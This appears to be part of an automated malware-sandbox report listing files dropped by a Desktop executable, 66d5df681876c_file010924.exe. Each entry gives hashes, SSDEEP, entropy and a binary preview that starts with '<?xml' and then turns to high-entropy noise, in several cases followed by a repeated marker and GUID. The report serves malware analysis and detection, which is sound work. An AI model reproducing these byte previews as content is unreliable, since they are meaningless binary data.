              Preview:<?xml...Sa(.cx..p.V..&(x....4...Y.].M/..W;....i.W......nBY.S..9.Hr..ld.+.._..,}....X......hc.^.....$......cF.zt.Q{.,~fl../..Qq.....-....J...j..F.....f.......d..9Nc..Ezl..{'...p...G...D...........1@..f^b....R..)(...=..e.}...z.x..r.|}....(..t..>.8........{^...d..Uu....44..Pe...<3..`.....:.?r..-.......S^.wh.....{D.....].D...v.kT..\..^V..>B.@.D86p....Rp..).lHu/K. A<.I.%.a..z}..C....b..z.*.7.......r}..x.&..i..D..9T..4.-4O..1.9?m.+..%...P.H)...0sv.F....u*.s....._..`...|n.m\>....~..-D4..F&.D...q.F=iXI..T....WP?.1\...W.[.....kT.U..L...gu.....z.xp....D.........R.@.....>.jo.'x ..O..s........+..bq.}.6?[..t$o.W.U0....5/.t.QT%.z..2..M..P...z......V$(x.qX.4N....!.....:i..FjF..+.(.a4......,..q.....C.5GG.b5..9..../N.-..iJ. fG.....>...R.{...9....^.G....J..&...'.2.A.5...........Mt&.7..~...Y.]_8.=v..f.!!... .E....T.. T.f:cS.v.d7...!..c....I...+i.>......Jgi.....O...n.A....A....(j.Vl\.E...R...K..J......-o.'w.j-.p...}.'..a...I..eh.L..o....!.o.....,.e|X
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):789
              Entropy (8bit):7.698685906263142
              Encrypted:false
              SSDEEP:24:eQyeDbLzjZ512tgxpEgbivUndTdkali7bD:oAbLROt0EgcUnNdvli/D
              MD5:FA6B96E0C88664D01424F5A1E8DBBCED
              SHA1:F0BBB921BD8E875B03FC59A1E67AA825DFB24EA9
              SHA-256:AC763ACBD3D4F0E9427A80F6F3630F917963E5A83008BDC5DCD18398DF2826F8
              SHA-512:3AD1D9521DC8ABCF15032FE347F44ACD9CEBC3DBAB9D804733545B110CBA652CBFE82F062C0FD19BF1C3E0CAC3444EB1A88F8EFD1BA3905D15058FB80B5E2C9C
              Malicious:false
              Preview:<?xml,q.^.....(........Z..=.*...r..xUed....Q..Z..\...l...e:..LT.3..n....v.j.,.v/C.+0....c...A@..w......f..[Ti..`.>..h=.M.P3..S.....1E`H.M.tK.....h{cLSw^..gM..V.U.!...#.......&@!..l......mH..wmX.....{..3.,...Y.Y.(E5uS.m.F.Q.Ql ..+...k.Rn2R2.>...5V! ..@.rc7>.h.6xt.Iq...,..(h..0..^.|8......N..#....U.u0s.l...0.;..//'...b.....m....o......2.R..#..d.q.UG.#?N.HC.....5.!._...@S.....@Eb..0.......4. S...K/0...gE....R..{...y#F\.VNe...-..s.Ds....IUS....#..x...)...B..RsV"...}.......%....n..G.E.>0......M:.....1....:k......F.H|W?&M)]..,..._.w.).2.k.........P,c.].KN........n..f....w..f.w15..D.KU>..6.:..Eu..\CG.8Q.sS9RVp....0h..?6!Vn.............s.L~...V.zyd.b].+Fc........rB..q..F.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.93908805134802
              Encrypted:false
              SSDEEP:48:ypojGmLDOEx5zguYCclMQWsW4OkJ0elwtXQyYc7qSBPw1uD:ypoyMgCPQpWy0Ow9fxOy+W
              MD5:1F6B3E7803E658E27EFDBE82043FBBB0
              SHA1:608CC1028D98D1ECC38054ED3A10C536D98FE320
              SHA-256:6D18AB5D05B85F033C6E092DA977B0D440E6C4F2C8478DE48557C05521829B15
              SHA-512:C6B7A3D74913B219D03B2DE46056ECC097DB26D25AA08569EA2E979024F283765C9E743295F21AC9BB4A38BA2329AC3E4A7643A6EFA9C3C5666F2C77B410ABBB
              Malicious:false
              Preview:<?xml..d..w...'.uu.. ly.E..u........#7....2;L.|......%H..g.!....S...l.....M.^p.........3....G.6.%..I..7-*.=.C..1~..h...\."./.g..J.......f......n.........C..Z.L}V^!OI]7$?/..~......H...RY./.d#.U....S._O....}.EP.......s...G.D.\M..).=.z*..BY..1.|\..\......|............5..8\.b-j......0u....8.........a..^Z.(. .@t...w..P..c.d.......;.....].."^t..G....p......m...8.p.$..f.....nI....u..X....M..........a...8.K.S.^,k.....].6N.^/..3.].w....o.3.....;-..Z-O.._cky....]L.U ..A.5N.....;i4(M.........N7..-(..Gk..xS.....pd..Y0+H.G..yA.....,.F.nI.p.W.H..].d.b..z...o.5....+=.....lR. .q..C.h.a.ba@.~,.)........S..j...S^..l...B.............,]Oc...... G..6..)n..G...p.V6.78........._te.%._.<$..:u?41..c'.V..o1..^.B....paRn.+.Fi.o.}.&4...~.G....A...$....Y...{#..%.57...`MS...<E.|..i...c.....-...e.cn..S..fW..x]W".a ....S{S....)..?..=....4.E.-......[?...o{....g.DP.. .zk..C..L.p.-..Lo.~~....9m..XJ.........?..JU.8.7.f.8..n...&z......A..;b.;...zJ..y.......|.B..@H.Io....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):823
              Entropy (8bit):7.753313634668583
              Encrypted:false
              SSDEEP:24:/ZQnGV/magB8Dg5NJHHISIlEOFg6dRAQbD:/Z7uaUxTpHISYjgURpD
              MD5:6C3A9BAE16B0D37FDA2943217BA058BD
              SHA1:C8CE00F0CFE93AD83969F9CC88A9822BC8E76B5C
              SHA-256:66B9C2EB316082435B9E2E0D271426C34A019B81C93F82BDAAC39FAB059A1E9E
              SHA-512:194798CC22CB4A056C450286FCF3380B1405B1BD99F786C40A6455F211C377C7DC71BE4486F246962701A98DDDF5769398685764FF7E8B8BE8C093794C6AEA84
              Malicious:false
              Preview:<?xml.[oh.h.9,t.B.W.]..s2.1.K.....*..qI.n.C....M..,o...g.v...R.pP......jTw....U.5...".l.i..S..yp...%L...'.a~;..T.o9wKP..Y..]..^..R.L....$1........VK......rP....-V.W=h.j.\.....-.,+..8...VFw7,..V...$......-....R^..Q..........(..y'.o..i..e.-M.]..w..8..@I......&......:.....c....2.E.z^.p5*.J...e...Gt67V%Q..j.$Fc|..=t....C..@..BUk....Dm..&..(>._u..-P.z..T...."J....M<b....s`C.)&...K.bz..Q...GW.......;.7.I.;..{)@........`..AV.....>..W..mx7^W...8F..3./....-..>.1..k...~..X.J....r:>.....Z=..s.t$..!4"............D..d=^,.........JF..t24U.ZjO....yp..rg6..L.k...\...BY..A[y..'Da|...7...N...R.X.Hj..:^B.....q>.].O/..}.*.....q.....Q..I..O...LmR..j.:.wVu.H..........{.!.B...`..8....K....e.Q..Q..=E...e.a.H.h........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.934771321791227
              Encrypted:false
              SSDEEP:48:bIVLHZIUNPA50BXyQ/GpQExYNyjjPwR37Tfma3EVmfj4M2WKgiPku6DgDxmD:MLBg0BXyQ+pbxYNcjPULLt0+YVgSWN
              MD5:F5633FDD2FC99585C07650E28041C18A
              SHA1:F592C1841B328A98BBF874E0121DC29F8AF4A749
              SHA-256:99BE922EA33D4039D693EDB380D9290E5346DB687C614F6372D72B988D4D2541
              SHA-512:91303C5C95DB3758823B8245B504B4A2CC110FC5DAC2606DC1E4CE79FD8F00890516837DB5574DD851B711E816348BE9826ACFC15AD3045BEA74E880E19D3AFE
              Malicious:false
              Preview:<?xml.RN.......Z...fS...#....m..>t.:9.I.....Ct....c.W..o.[q.F..2...]i..........d...;.R_..).?.P..=.P...iCX.W.W.z..m....K.#.r..6"B.}...(.b.X.G.,.....N..2C.Tq..(.......k.n...n.!.4C# .l...a`..5.....i..Y....5....f.P...S.d.A...............6..\7...r.=......m.KL....m.}..n...].=...C.0....F....S.f.....#...Q.....Z.....r...@...o.a..K.I.x.f..........P.......i....p..........I./..}.......{.&.1...Q..u....}.e..6.^.60...!qe:...4...=.....g{..t.......P<....d....&.:"..sL..M&....]@.z.....9....."%r.Z.E1...E`.:r.h..+o^..4.g.+..(..g.........R...{._..G..0...hn.>h..[.S......a;...|....()~N...*...h5Pe.(.........U.hL.~..A.rJ.?.........{.....Ur..1....C.<....=Lb@....{.h.R...p..Q......E........#...>qmm....=...d.qF....^+............#.....Ki..r.../..G.&....t*.!i..X.. .........~x....I.....&.d...&..J..1..........x7.....e.+0h..x.d..}K.KTV[D..E...$.t.Do.....V...O....+..C.M.b|.v.a.......,.6}._....pPX....D...5.....Uz{R.0.....R.;...0...{G... .@..,.....Z?1...<u#b.w.91..et.8..:Ey....73.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1021
              Entropy (8bit):7.780149195304183
              Encrypted:false
              SSDEEP:24:zdHsoAex/bT0xa+52HF1eKFnjD3Z796T5BhUZ70aGabD:zBsCv0wGKFjF8bawNYD
              MD5:4A03F355AEF600D0BF0379743F2D5D79
              SHA1:FEEF64BEF062585970BE3FC67BCDE53B44C8E15E
              SHA-256:1FF04B21D0CFE3848AA2523F78F54A203C565D983B3781DA2BFCC7D04495BABD
              SHA-512:AF8156F2B51141E33A5F448A14D40195BB093646146A6B3AD1C26B43E7F4534751A0E9FC08BE457B6DA678C2A034AC61AA70D07154D2CD07AC4F7E2020EDB2C2
              Malicious:false
              Preview:<?xml.B..n....M.....b2!.^.6.y2q.7.?...e....|1.4+...5.@A.......j.tBr....o...d.1{.@.p..9ze..U.}.#xl...y...>\@P..I.........h..GJL*...034.xv..eg.=.y1M\0...m....W.Y....g.S...{x;...{.i..9QtD..r[f..&.9c_.[AM.3qg.2F=3J.?....P..=x....bJ..........@X(...[.+N....\J.S..C.U0$,...4.Z....1P.:.B0&*P.J.]...[.1..e'.).0..k..=.c..2.,.!-f..9O..?.v.......9...i...|F.n.M..#.....!..GA.......EV.;..T=.....0.no..d......O.cU...K.......T....4...`RH.W...^n..*.....`..t^.p..,.Q...n...0......[$.q..:IP...*.....&.rN...F.l........H.u.z..'.J&&.@.......Bs...!.[.kc.X...}.Q..Po..K3]T...[.z......].O..x..NjT.5]...*.D]?.oq.~.U....eJ(... ..../.xEE......1..@X..T{.m......G7@.#.........l5...&.\.\....O#.l..&&PRJR...+OK''.?7...Y1R..k..B..i......mi...c.....L.>.s......W.....1I9..0....L.4P.NS.m.8M0.(.jYA.{u......._eP..?%A5.....z.Q.....{u.fsTM.JV.0......z..W...=[.'....a.9...\b......,t$...B`\...^.i........L!../..o.>..Gx.;...1`<endK...i#i.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1398
              Entropy (8bit):7.8422238356830825
              Encrypted:false
              SSDEEP:24:cMexUi3dN4S4+5lgaLkFN6tEXCXBzaKlh75Bc/gmcBN7TdzqXUbD:cjxUi3d4+5zkFgEkzfFS/vcTdzY+D
              MD5:8B74F9FF2644E87B86D5745C0D135103
              SHA1:E7C1CEBD9A4EC59DAFCC28942E0A5F108473AD69
              SHA-256:6C13BA361319BE3BDCA5E050E75406554F59B81B41BC85D3546997712C0F35D6
              SHA-512:2D479294A5D35CB7623BAEF4F4E5FA03059F12E073EC904B7B55E9BAE8565CFC6F658CDEBD2B566262F5C3188B9A64281AE74991AAFBE8B2786B3E038BC60EF1
              Malicious:false
              Preview:<?xml.9..{..j._.m..9yW..*,....h*.C..4.........(3U.BQ.c..=.,^..c....i.l$....5.u{....!N,a.U...Q\y...;.g.l....L....~..4(=.j}.,.d7.]...v..o1..v...8=...8.>g.g...p.Y,..C..f.WANm.Y.Xv...M.7..'....iF.({.......![....nh.?..g*A..a.o...V>~.._IM..`.....y.g....[....u&...MM.O..h..X.5.)OW+.{k..y..:B.5.((.../.6..*.x9.b.U%..(v...q=.-i7...yXm...A.m....^:..F.....r..W._&F....g.^..%.B'7....?.....]..C#....(....E...u.-.....ZI...........D........._.....vxYh.Y.q..>....xTo.hN.g......z../.6."/../.s.B+.%..........b..n|....-.3..B1...3..z.@.f....h.. ..*........<..<."......O?.....)..c{.w"^.J]...r._..:1l#.'b...q.@z.7.0y.[..!.C../....%M..}q}FP[..".4.?...".w(.w.p.f.X....#...6.Q'h.Z:7.....q.....r.#..".F.\.....]..N..Y.v.....Ze......`.....S. ...Lf.[.z.+../.v......@..gT.?U..[.......3"0...l...r.QU.>4.....6.cmR..|..X...H!.U.4G..L....v..ZR...w....Gl..<.?rZ...|.Y.2....k.H:...V:...s....;...8@m....v..R....}\...F]G..3....../....S..O..r..:.......?..5..5M....l.*... .+..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):937
              Entropy (8bit):7.73836503319956
              Encrypted:false
              SSDEEP:24:Cd1ooR/yxuWhkA5pcXXYP6zr8zpCI+HbD:C40/Q5hJ5KXpuCfD
              MD5:6EF533CBC37414ED46C9E8356E31436C
              SHA1:51D9CA4F672124C82B8F421663C7DABC4A3230D0
              SHA-256:C0094E1F44DBF0EE3B8EE0490A542943A6E6F928AF4FB5A5EA97E391C0729B75
              SHA-512:F6C80B0FBF5B2D68677975D81F4771E369EDE619B5B21713FC5313BE8315959E6D13E11E80ED5E92193E4CF16C0520ECB811EFD3E027112BA1BEF418CB6A6B1E
              Malicious:false
              Preview:<?xml6....w.yXF...qe...0;..[..G$.....4B.Y.........S.u.1.}$.....}.WU.w......|.[....2...l?..k.'DX..5./.^..t'...c.....i...8V....i...$....i...1..f-).2^...._.(...t..QS>....z$wr$..6.nu.W..A.+.......*.?i.,i..R~U..o.:g.FX...u..8.-.....|.h..R..P.......ZI...%m....1.s.Zn.`6u-.......13....5.X>H%...W1.nF..T>..yY...7..85.q.M.......D....f...Z.WC...J....'.....;Bs_..y...c..i.o....*..8...Z.K.F.4.z....L...V.....a.A....^...+e..t.i/-...('. ....#...?...l...!..nW.&.s...&..n.. ..m.o.E....p.. ...........,..aT...rl.P.U..L(e..9N.8wV..FG.m.9JK.-..45VB.r.....4.3....F.w-.z......-......sO.{}...Y....}e>..BNR.........J'a>$LU...AjZ.W.@sB...Q.6....o..4E....*.).o#.!..x<.f}N..r.Nx.._....D..k.0...c........8r.M.C.>0O...B.2...d..Hl.jD.Yc..i.p..=.E....=.j.....]..B..YJ......(.....Q..>Q....+.......]1^.*Ws....."..;.8.Tr6.#..)X.7.......a..O.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):891
              Entropy (8bit):7.779432026310249
              Encrypted:false
              SSDEEP:24:FZ/tRrh7CYRSs3pW7wC45rxGOi4o8aTNhEbD:FZ/Lh7CzWAz4BxGdzOD
              MD5:3FAA1223A79FC9A50E0CEAEA81A3D691
              SHA1:0530C7E6393A580EADA6A59897086914E71DF0D6
              SHA-256:D405847F6AECC18B143D091B7F093C7A31F2D4ABE1E5EE5DA723D20685D9F691
              SHA-512:EC269A8C19E62717E19E20F4B7D30C8544AFD55751BEAB876B576279C8CFA97DB4037BF88657A0FB4F45B2938246BE19CB5829F2E1B091008DD4681C68DA949D
              Malicious:false
              Preview:<?xml.)..H.!*..P.b..%.q.G\Wj.-.....tnc.$........<w].&<..[.1.$.g.9i....(.8...4>]=..V......d....l..w..0...%K.)x...\.2#...z..*B..d..:.0.Ww.............E.m.D.F....-&..vr.Z.e..%p..H.H.s_$j...11...n'.oP.Q.(.....h3....\.g..`......[ri....!.....L..W..nj..h...H>A9.h..g9..5R.SL.H...j.#."..r.CC../B.U..0*.......y....0U...Y.7;+7F.V...\..5r..{.=.U..%x./l+....$......../.L?.C..-G.@ekk.o.*K...w...]0.......q{_../}}.u.'......."..P.Z...Ol.....P}.....E!..&.@..8..........}.......Y..+._..o[4.#.\.g.8..%.....N.cu30&...M..q.%.f.b..c...qG.e".aI._A|B.....`.aK..S....1g..U?o.'X..5.F/..Dj.....Nc....tb...G.mQ.B..&..L..O. .+.4[.u.q....9.]*.T..?...\?......9J...!...u..:....)........lv..>.c+....gN4{.[.``.}..Y..:=?..v..Sg..B./.].d.$..&.V.pd...O..,.pd.E..VK.,.L.$.W...M../...v..4....2......K.....ZP2..s'tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1049
              Entropy (8bit):7.808475770684193
              Encrypted:false
              SSDEEP:24:5XvCr2hSjqb6y7p/55Xrc8x8shsTVve8xmlPnkVa9aMbD:JvCr2kj27p/fXrpx8VvTxmlPIa0GD
              MD5:BE09A179F271A3DB5E6C64B823DD53EE
              SHA1:16B1379F77A40993E471317AAA76196CF084B9AE
              SHA-256:7EAB1458BEDBCDDAA5607D8A9CD5B30C394DA9801FFD2BE87BF0983E5BF72C2A
              SHA-512:BF830812CB4EFCC058D52DA4B381A59D7A28A940B2153AE05354472731BFB3EB5A42F0D524E160FB8B3358A7D5603ABE6A06D48471AA54A5A38F79C4A3A35B8E
              Malicious:false
              Preview:<?xml..AA.#......Z..~|l/..{../w....V#....uf....`....j^*!.=.9....q.X.l<.4k.w;n.b.?......;...\.u....t....D.......\.[..O. ~...@..D...X....X..v............N...f.wH..U,...`Q:..D3R.n.5.aJL.YD/X.r..W-.\...)..nr#..k..Q./..l.yo.O......k.N.i....R...wh..c..I........@...3X.HQ.....#A.".P..s......-..[....%.`..?..{($...Q.6..;..@#..V..~fp/fU..,.i9MI0i-.....m.1q....m.f$b.x."T....H.b.(c.G(0'...Ut..xn........3.C..[Y8n.j....|......=#...F2[">.....k$.N0B:C/.....7..-lP..m.+g.w....(.}.r-._"W?!..]./.j.v.~u..%@..C.............T$...p+.Kpz_RXTR.N......I....@-....).."...Z....X.U...7..l9Uu.z.\W.$...L.......XR..../.hv.`.,..q.m...L....:k......KRd9...$%..2:}Q.w..4.%.....307.A....&...n.|...k[..y..Z...s.g4...Hl.^...5...ST..Bt........t..<......+.#.KC.@6...^.`JnR'.^..Lc.W.N..gu7..jk..P......v(T.Y.X.Y...S..o.$...E..J.'P.....4-..N.....<..J...?J.Y..=.{...}0...e!..3...c...:._6..-.=yi.r..E.c....8.....X....P..`.}t....@.W..a_..n.v.<].k3.1..b.tp8qj68iQwedJUixDcnQEpfFZzicx
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):885
              Entropy (8bit):7.770146163171175
              Encrypted:false
              SSDEEP:24:AE4mhQI+azsugiuniUb2oVaGIH9ah99LdNJbD:NnxsuXuniC7Ln9lhD
              MD5:FFEB73F0A8C464FC26521BED6C3BEB7D
              SHA1:A8198A035740A06C5B6FDEF3CF13D6910EC02BCD
              SHA-256:D554D9D42DA2657A5B2CC1CCCEE57FEFF2D91950644C1AE419593A8AC1E752C5
              SHA-512:A97D6CE3A8CE35CF0706563DDB29A5AC10AF844123BF3DD00FD79945E1599CF3952D34F0114E9E31B5F85A8848E00883A9CB95F14B75F069D1F16D415011CCD6
              Malicious:false
              Preview:<?xml..30E....R....M.E...4....'...5.T$.....yS..O. ......r.D.........w...G.|..L...%....Wh.....[/s..v...i].F...^.*2..........s..A.8.......m.Z.C....\....7...(9*..y.=......ti....M.lO.Cm%.9*j.i.x=avXx.;d0.O.:..rN.No8.[}.2.m{".c:E.5..7..sW.'*.J..........TM.. .N.?...#S1.i..o..+./FG.0a&{.!.'.~mJ...........s.....\.&.Qm......;B....4...%>../T..M.E....2v.p......=&(.|.9{.*.Z..Jb....lZ..tf...C...e..N....t..V...$8N.L]..`c.......@b.x..T.....E!...@j'.q.#..'.2n...c_.L!u...F..,J..6<.yn...v|.7O..8T.N..5.[.+pY.G..@....Z.{ha=.pP.s.K".P({l........YhI/L\..\lN..G...=.%.!-.e...)f.=.....c.b. .j.F.p.{/. (......F...............G.........w8.....|.Z".H%B.|.Y.\..|.....&....Ou..u...8.fZ.q..'.6... ..o..0....>V......O.{.E.h.p..nI.-.u>.?W.X.9\/....gt....!.k!}....kK..{...._ ....!.......WAtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8529
              Entropy (8bit):7.979257134512328
              Encrypted:false
              SSDEEP:192:NnxAqnxJTh4Y9aNJhX5QSJh/xvlEc40NfF+LgXCDsrYXkPCrdAFN:hx5N9aNJhJQSj/xacigSDsrfPCZAFN
              MD5:5FF5FC91BFEAA9BD4F3201EB96369D87
              SHA1:C3B29C893C2276EDE1B8D3850D0A4899D11D15D5
              SHA-256:85AAA52F973DB9260262169C7F54E6BD92C60D76E8EAC2632E297EDDE458163C
              SHA-512:AFC05BBA7E2AB17225E9BF529CBA05C8405CEEE57AD5C92C32FFC4452CE300B73C6ACE1918505F1BFDA7B1B0411377DAC164A64F7309E52533104BFDDAC5DC06
              Malicious:false
              Preview:<?xml....Wvl.L.'o.c.0Bz...u..%A4........N5.r..Znk..M-..l..X~.Z...M...qj..z2.''C..r..........I....Q.|8'eQ...@.K.....O1.r....-.&.2~.3L8S{...Z......3.>.........jZ.J.S!...,.NLqe|2.}..i0.Mm.J...[m..J.r5 ..+..W.o.~f..q(}s..Sv....}-;.T..b0PE..v............dRZ[2.s.;+...&..^X...t#.0..9..[.3.3...5.C..4...*.1.=.....V..J..:...F=O.v.....Bc.4j..e`IMl.b..!...p...B.l.'L.e..n&.+..gB.H..\..+..Ji......PdH....s.M..5.-.. (...<.5r..%Q7k....6.u....f.Ds.H......g`w%...3.8....(..2.."%4I...>....`4..w.....o.........+...fe.|..Z....,.{l.p.....~...xj.pj.W......k.....V.#c.f...Z..5..>Q......{.{+.Ymc.f-....[U........3.X.+...dQ..D.PGX^..H.#.'..$....l.S....'.*......S.W..H...y.......{..y.p...pIu%.S"...........`7>+......z.... P...8...i.P...._QK.!.|.....G..E...j?R..F.D.XD....9..}K.t...L...5..kU#.^\y._e.m...?..M_...p.\].h`.!.K.m...S....P.I....dV<"...P...o.2.........WIshNt.n.Wx{ x5...?.B_..N!....R13..N.!o...rw....I...*9.E..+=MC..>.....6...<..@..l?.m..*...'.R......3BI#E.....;.>H...!.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1242
              Entropy (8bit):7.809794810963955
              Encrypted:false
              SSDEEP:24:Nl5sTumT4sJ//WQM+WNBvnDXhf4EBHyn+mADP8eFg8oLnsbD:Nl5gumT4InBMpRRfDBHynkP8e9D
              MD5:3F5B21456E69D9A39ECE888FA42B14A6
              SHA1:990E780ED804C5D139825EE551AA28386818787D
              SHA-256:3BC23F83A9CC5F2024F8DD42C0F05DCF5916ADC2B491EDBCA0FF4E00104FA00A
              SHA-512:8739E28E7E84DB6FC9494B942570E27DCAD417CEA450F9AC6E1B252F896EDDE0C19CEE6E10F903D3F62D99E1017460C903AC1264DCBF4A2668A66C089006DF2E
              Malicious:false
              Preview:<?xmlH...b.*...%Q!._r.2\....>.....l..6...a..5.....(.q...7.W...F;a:Zt%.I$...%.i.D.<9.:.....\......T.......L....n........V....r.xP#.H..D...2....Z..wj.].x.1.>.B.....c{..0..N...7{.n_X.EE....:... ...'.....z.}.N...Rxww...`7...M.....<v)...<..lexF.X.O...........J.P...l..2ZX...l.|.hj..n.9.K...hH.l..6..&..d.<:..R.v!G..U>.-(..B....n$..b......o...0.';8.<...*..?..!..........k....c.c....J.Z"x2.V....m...Ug.3pz..9..'...q..H...`.ER.. ....$iS....T.;B4.....3....g.l.9.......^%<-..bVn_.x....&.H.....[.RR...=..L>pK..>j~.B.7.].?c:.....h.4...cq...N:~.....m.I^.t.*E$..Y;<......v.EJ .p.`..1..v....~}.LO..}..o.\6fy..'.-+..5..&O`xI...q.u...^....(0.I...-.&1Z..xK]...<|...l.D;......._q.N)!7@...pi....."E4|.7.|.}W:{..Xv....5Z..iJ....MB.T.K...{.-m..6.....Y.D.....Z^A..v*_N....F.yZ....j..K..{..R.41z....Z>D.....=~.8..Is.k.T....~}...:..A.y.m...p.I.:.3..l.N.h.X..E...\..c.-..&..2a0....-...=.g.Z.[.. b...../K>.&t..q941.7&..~..7Q=..r....F..M.....;z..c.Y..".f.n)..7.Z..Y..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2983
              Entropy (8bit):7.943530417349566
              Encrypted:false
              SSDEEP:48:z7/JNNa1fxX22G/cHnFmPgyyw52bb/MnBv18qXWhISlFGfXHkOT5SyqPXHGZHw3P:z7/JNN+fY2G/EK4wQknBvD6sSfH0w3P
              MD5:34AD7505E1E5F70AA343C86178E98656
              SHA1:530254D3A3BBC6C9FAC0B216E7160A1364E72A15
              SHA-256:52AE912E8D6061AF7DC77A7CB9E3D8FAE8C3D97C2587F268E1368BC8AAEA7C69
              SHA-512:69194650123EC72ACE39736C52ADA31F6727A7D197B8B83DA63DDA2388B55A81776560E459202249DC8739CDA17D160D096FDE5D54CD50A7A793AA62F8678896
              Malicious:false
              Preview:<?xml.~.....;...GL..(@_;..j.d.B...h.u9$:..K..P..$.C3pf.....8"7./G.;*.e.E..#.c..w.*.B.b.. .K.5}...7.i....\..8y.ds|...`..=2...y.....B+V8d.N.'......J9.>-.K5..O_..X...Lm.[..mH.....[......#..v.."....hfe.\...U)^......n....U...R.B..<P.....V.......u`........T..II1)..%.S...Vo..&..|.....xi(..-..lV...L]83.,.M@....7.....h.5.6...R.&...7...~.^.7>P..:.@...ed._.._8.=..........#b......(//..,....W..\i..3..`{..oL..,.#...c..Q....QF...../U.....K~...dv...1.:.%....o'...4k;....D..*.Uu...L[......c.....D..I.k..g..B.,..0.e;.s.Nk...6..!....J+.R(..{2O.|<%].X]U.....Bc.......p.P.?v.~.DM2UP.1.v#..).;f.]q.c:2.......a.........Vl/5zBq...%......x.... .;..u6..<Ag}.E....G...W|.....t.....'lEk.u+qu......X.f.f. .>.'[#7.?...........!).X..w.Gs]...N..`.....>$....s.V...S..,...5...,q.CfI....2.dE...=^]...$...@.L....^.....<m...... @"......T.D....f...(...gw. .._.....z...u:.~./.[..BPg@.^`.[.pp.M\.f....gv...Mp....SD.|.w....f.......4..}..z.....v..P.%.J.V.m......A._..v!.T..t6%p...R.*4.m Wv
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2487
              Entropy (8bit):7.923902704891294
              Encrypted:false
              SSDEEP:48:x9fVVR3Hyuk/4a0P4DQYvXgaDYlyaTyZzJCVuEriZoaYOG53meKZfjD:xfVRXNk2SpvXCMa2HErZO+mZfv
              MD5:F67A62A5AC8C8EE019021FC1AAFE97DF
              SHA1:B66B1DA061843936C7F842930CDF5F71B25044A0
              SHA-256:CD0B3BA8D39CF5ACB4EB89DE8387E9CB1D20C5AB6914C55D74EECC791697F3BC
              SHA-512:5118C820570563F9D2634AC2651907AE19AAB329D41041C7C11B211A4AAF35F40B7F5F28CCAE719D2634E664D6DAEB9F5F198CC403AEF4BCA945EFFBCDBCB83C
              Malicious:false
              Preview:<?xml...2...y....e.'..nx.|..'\.D....6.W.0.z..lu..DP...H:.a.!U]4.....M.&..p...~..:..r))..8=..t1..I.n3l(........../L..d..4.....V.G\..nf.w....Mh.m:@.....HQ......H.SRY.X.S.........B....|>O$LsTf&..0..S8..w.qq.....`Z[B9<).n..e...)..G.1{.B..o.-......P4?Ez...u;..M....J.|7.Pr..Q..i.E?:......(.......b.................p&..u;Q3.A.......4..e.pb.....f]H/`~.BUc9..G..x....v.%|ow.M..t3...?;.a|Z..~z.=....?..'............./.g..'.R..e...R..[.U?......;..&...'.(.$.&...3..S...D<...^.y.1#}b.z..:.^.a.....v.7...q..m5..V....NNZ`....iN.,jq..xE...Kx.BL.2H...u.Bk$.f.\.Z....jS...T..)...@..^9.Y.Z.D.g.P..3.~o0...........q V....w.<.%..sKZ^.R...,.ai.4...5.S2N....o(....<.#.C.:dT.[x.f1.{......;."%...Y.?.N.?..yIT.2.4.&)x..)...|t]....W...m.....(.aV@a....g;5..".[....SF6...\D.....s..V".O......aN..3...e...X..g.....N..g3)./....b......g.C...tbk.J........F\_....h.|..W.'.@..e....6cq.../.:w............Y..c...:.......n.&. l.....2LQ...R|.....k..M..A!........q..J....;.|..........h...j..B@.....8....a..}`q.`#.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3132
              Entropy (8bit):7.935505008496268
              Encrypted:false
              SSDEEP:48:UT0Lp6CMKpJN5sZNyg/OYNMtIj0a5aSfZFa6rcZl5YUNiSY1cpD:UTIp6ckMtda5Ha6G3UWB
              MD5:AE49768E07F594B09D47BBD91E1F5A27
              SHA1:667218D76C259C657CA733BFC2D9DEFB610D520D
              SHA-256:37F1652092C8B1260D25853B025A1F31FD08FE85DAF633B8C842C4DA389FCE6E
              SHA-512:34ED6869005AB30F709728457E2DD6D6F59F56A21EA50333E7654ABADFE9225B85BF338238D588403D668B2E49722B15E29C59F74FD20E8C9DE029C7C6DF31A1
              Malicious:false
